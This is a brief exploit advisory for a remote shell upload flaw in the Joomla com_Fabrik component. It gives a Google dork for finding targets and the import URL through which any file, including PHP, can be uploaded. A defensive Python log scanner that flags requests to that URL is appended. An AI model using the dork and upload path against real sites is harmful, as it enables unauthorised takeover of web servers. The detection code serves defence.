$********************************************************************************$
# +=================================================================+
# | Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability |
# +=================================================================+
# Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
# Date : 14/09/2012
# Exploit Author : D35m0nd142
# Vendor Homepage :
# Tested on : Mozilla Firefox on Ubuntu 12.04
$********************************************************************************$
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
On this page it is possible to upload any type of file (php, asp, html, jpg ...) through the "Import CSV" form.
Happy Hacking!
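A log check for the import URL above, added here as an example and not part of the original advisory: it scans web access logs for requests to the com_fabrik import view and separates out POSTs that the server did not reject. It assumes the Apache/nginx "combined" log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client, identity, user, [timestamp], "request line", status, size...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_fabrik_import(target):
    """True if the request target addresses the com_fabrik import view."""
    parts = urlsplit(target)
    # Assumption: index.php is also served as the directory index ("/?option=...").
    if not parts.path.lower().endswith(("/", "/index.php")):
        return False
    # parse_qs URL-decodes names and values, so percent-encoded spellings still match.
    # For duplicate parameters the last value is used, as PHP does.
    q = {k.lower(): v[-1].lower() for k, v in parse_qs(parts.query).items()}
    return q.get("option") == "com_fabrik" and "import" in (q.get("c"), q.get("view"))

def find_import_hits(lines):
    """Return (ip, timestamp, method, status) for every request to the import view."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_fabrik_import(m["target"]):
            hits.append((m["ip"], m["ts"], m["method"], int(m["status"])))
    return hits

def upload_attempts(lines):
    """POSTs answered with 2xx/3xx: the import form was submitted and not rejected."""
    return [h for h in find_import_hits(lines) if h[2] == "POST" and h[3] < 400]

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [14/Sep/2012:10:01:02 +0000] "GET /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Sep/2012:10:01:40 +0000] "POST /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [14/Sep/2012:10:02:11 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Sep/2012:10:03:05 +0000] "POST /site/index.php?view=import&option=%63om_fabrik HTTP/1.1" 200 412 "-" "curl/7.22.0"',
    '198.51.100.9 - - [14/Sep/2012:10:03:30 +0000] "POST /index.php?option=com_fabrik&view=form&formid=2 HTTP/1.1" 200 950 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in upload_attempts(SAMPLE):
        print(hit)
```

Parameters sent only in a POST body do not appear in an access log, so this check sees only requests that carry them in the URL.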